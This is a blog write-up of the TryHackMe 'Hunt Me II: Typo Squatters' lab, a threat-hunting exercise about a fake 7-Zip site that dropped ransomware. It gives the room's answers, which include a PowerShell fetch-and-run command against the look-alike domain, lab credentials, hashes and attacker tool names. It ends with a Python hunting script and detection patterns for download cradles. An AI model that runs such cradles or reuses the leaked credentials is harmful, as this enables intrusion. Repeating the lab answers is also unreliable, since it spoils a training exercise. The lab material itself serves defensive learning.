We covered a scenario in which a Windows machine was compromised through a fake 7z archiving tool: a typo-squatted download site served a Windows Installer (MSI) package that in turn used PowerShell to fetch the ransomware from the attacker's C2 servers. The investigation in the video works through the network and endpoint logs dumped from the compromised machine to hunt the indicated threats and extract the indicators of compromise. This was part of the TryHackMe Hunt Me II: Typo Squatters room.

The scenario

Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application. 

Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.

Check out the video below for detailed explanation.

Room Answers | TryHackMe Hunt Me II: Typo Squatters

What is the URL of the malicious software that was downloaded by the victim user?

http://www.7zipp.org/a/7z2301-x64.msi

What is the IP address of the domain hosting the malware?

206.189.34.218

What is the PID of the process that executed the malicious software?

2532

Following the execution chain of the malicious payload, another remote file was downloaded and executed. What is the full command line value of this suspicious activity?

powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)

The newly downloaded script also installed the legitimate version of the application. What is the full file path of the legitimate installer?

C:\Windows\Temp\7zlegit.exe

What is the name of the service that was installed?

7zService

The attacker was able to establish a C2 connection after starting the implanted service. What is the username of the account that executed the service?

SYSTEM

After dumping LSASS data, the attacker attempted to parse the data to harvest the credentials. What is the name of the tool used by the attacker in this activity?

Invoke-PowerExtract

What is the credential pair that the attacker leveraged after the credential dumping activity? (format: username:hash)

james.cromwell:B852A0B8BD4E00564128E0A5EA2BC4CF

After gaining access to the new account, the attacker attempted to reset the credentials of another user. What is the new password set to this target account?

pwn3dpw!!!

What is the name of the workstation where the new account was used?

WKSTN-02

After gaining access to the new workstation, a new set of credentials was discovered. What is the username, including its domain, and password of this new account?

SSF\itadmin:NoO6@39Sk0!

Aside from mimikatz, what is the name of the PowerShell script used to dump the hash of the domain admin?

Invoke-SharpKatz.ps1

What is the AES256 hash of the domain admin based on the credential dumping output?

f28a16b8d3f5163cb7a7f7ed2c8f2cf0419f0b0c2e28c15f831d050f5edaa534

After gaining domain admin access, the attacker popped ransomware on workstations. How many files were encrypted on all workstations?

46
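The questions above trace one execution chain: a look-alike domain, an MSI run by the user, a PowerShell download cradle spawned from it, a binary dropped under C:\Windows\Temp, and a service that then runs as SYSTEM. The script below is an added example written for this write-up, not the room's data or a TryHackMe tool; it runs the same hunt logic over a handful of constructed, ECS-style events so the pivots become explicit code rather than manual Kibana searches. The events, the file name 7zsvc.exe, the documentation-range IP and the vendor domain in LEGIT_DOMAINS are all assumptions made for the example.

```python
"""Hunting a typo-squatter execution chain over constructed endpoint and network events.

Added example for this write-up; the telemetry below is made up to mirror the stages in
the room's questions and is NOT the room's real log data.
"""
import re

# Constructed sample telemetry (assumed field names loosely follow ECS / Sysmon naming).
EVENTS = [
    {"event": "dns", "pid": 4120, "query": "www.7zipp.org", "resolved_ip": "203.0.113.10"},
    {"event": "process_create", "pid": 4120, "ppid": 900, "user": "SSF\\perry",
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"event": "process_create", "pid": 2532, "ppid": 4120, "user": "SSF\\perry",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\perry\Downloads\7z2301-x64.msi"},
    {"event": "process_create", "pid": 3104, "ppid": 2532, "user": "SSF\\perry",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)"},
    {"event": "process_create", "pid": 3388, "ppid": 3104, "user": "SSF\\perry",
     "image": r"C:\Windows\Temp\7zlegit.exe", "cmdline": r"C:\Windows\Temp\7zlegit.exe /S"},
    {"event": "service_install", "pid": 3104, "user": "SSF\\perry", "service_name": "7zService",
     "image_path": r"C:\Windows\Temp\7zsvc.exe", "start_account": "LocalSystem"},  # 7zsvc.exe is assumed
    {"event": "process_create", "pid": 5000, "ppid": 1, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\Temp\7zsvc.exe", "cmdline": r"C:\Windows\Temp\7zsvc.exe"},
    {"event": "process_create", "pid": 5200, "ppid": 4120, "user": "SSF\\perry",
     "image": r"C:\Program Files\7-Zip\7zFM.exe", "cmdline": "7zFM.exe"},
]

# Assumption: the vendor's genuine domain, used only as the baseline for look-alike scoring.
LEGIT_DOMAINS = {"7-zip.org"}

# "Download cradle": an in-memory invoke (iex) fed by a web fetch in the same command line.
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
    re.IGNORECASE)
TEMP_PATH_RE = re.compile(r"\\windows\\temp\\", re.IGNORECASE)


def edit_distance(a, b):
    """Levenshtein distance; small values between a queried host and a real vendor domain
    are the classic typo-squatting signal."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domains(events, legit=LEGIT_DOMAINS, max_dist=2):
    hits = []
    for e in events:
        if e["event"] != "dns":
            continue
        host = e["query"][4:] if e["query"].startswith("www.") else e["query"]
        for good in legit:
            if host != good and edit_distance(host, good) <= max_dist:
                hits.append((e["query"], good, e["resolved_ip"]))
    return hits


def download_cradles(events):
    return [e for e in events if e["event"] == "process_create" and CRADLE_RE.search(e["cmdline"])]


def temp_service_installs(events):
    """Services whose binary lives in a world-writable temp directory are worth a look."""
    return [e for e in events if e["event"] == "service_install"
            and TEMP_PATH_RE.search(e["image_path"])]


def execution_chain(events, pid):
    """Walk parent PIDs upward from `pid`, returning the chain root-first."""
    by_pid = {e["pid"]: e for e in events if e["event"] == "process_create"}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return list(reversed(chain))


def hunt(events):
    """Run every check and return the pivots an analyst would put in a triage note."""
    cradles = download_cradles(events)
    return {
        "lookalike_domains": lookalike_domains(events),
        "download_cradles": [e["cmdline"] for e in cradles],
        "chains": [[p["image"].rsplit("\\", 1)[-1] for p in execution_chain(events, e["pid"])]
                   for e in cradles],
        "temp_services": [(e["service_name"], e["image_path"], e["start_account"])
                          for e in temp_service_installs(events)],
        # Binaries under Temp running as SYSTEM: the service start that preceded the C2 beacon.
        "system_temp_processes": [e["cmdline"] for e in events if e["event"] == "process_create"
                                  and TEMP_PATH_RE.search(e["image"])
                                  and e["user"].endswith("SYSTEM")],
    }


if __name__ == "__main__":
    for name, finding in hunt(EVENTS).items():
        print(f"{name}: {finding}")
```

Each function maps to one question in the list: the DNS look-alike check finds the hosting IP, the cradle regex finds the PowerShell command line, the parent-PID walk recovers the PID that launched the installer, and the Temp-path service check ties the service name to the SYSTEM-level process that followed. On real Elastic data the same logic translates directly into KQL or EQL queries over process.command_line, process.parent.pid and the service-install event fields.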

Video Walkthrough | TryHackMe Hunt Me II: Typo Squatters

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.
